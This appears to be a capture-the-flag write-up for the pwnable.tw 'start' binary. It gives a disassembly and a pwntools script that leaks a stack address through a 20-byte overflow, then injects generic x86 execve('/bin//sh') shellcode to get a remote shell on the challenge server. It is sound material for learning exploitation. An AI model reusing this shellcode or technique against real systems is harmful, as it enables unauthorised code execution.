看保護機制
checksec start
看源碼
objdump -d -M intel start
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35
| start: file format elf32-i386
Disassembly of section .text:
08048060 <_start>: 8048060: 54 push esp 8048061: 68 9d 80 04 08 push 0x804809d 8048066: 31 c0 xor eax,eax 8048068: 31 db xor ebx,ebx 804806a: 31 c9 xor ecx,ecx 804806c: 31 d2 xor edx,edx 804806e: 68 43 54 46 3a push 0x3a465443 8048073: 68 74 68 65 20 push 0x20656874 8048078: 68 61 72 74 20 push 0x20747261 804807d: 68 73 20 73 74 push 0x74732073 8048082: 68 4c 65 74 27 push 0x2774654c 8048087: 89 e1 mov ecx,esp 8048089: b2 14 mov dl,0x14 804808b: b3 01 mov bl,0x1 804808d: b0 04 mov al,0x4 804808f: cd 80 int 0x80 8048091: 31 db xor ebx,ebx 8048093: b2 3c mov dl,0x3c 8048095: b0 03 mov al,0x3 8048097: cd 80 int 0x80 8048099: 83 c4 14 add esp,0x14 804809c: c3 ret
0804809d <_exit>: 804809d: 5c pop esp 804809e: 31 c0 xor eax,eax 80480a0: 40 inc eax 80480a1: cd 80 int 0x80
|
exploit
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| from pwn import * context(arch='i386',os='linux')
filename = './start' io = remote('chall.pwnable.tw',10000)
io.recvuntil('CTF:') payload = b'A'*20 + p32(0x8048087) io.send(payload) ad = u32(io.recv(4)) payload = b'A'*20 + p32(ad + 20) payload += b'\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80\x00' io.send(payload) io.interactive()
|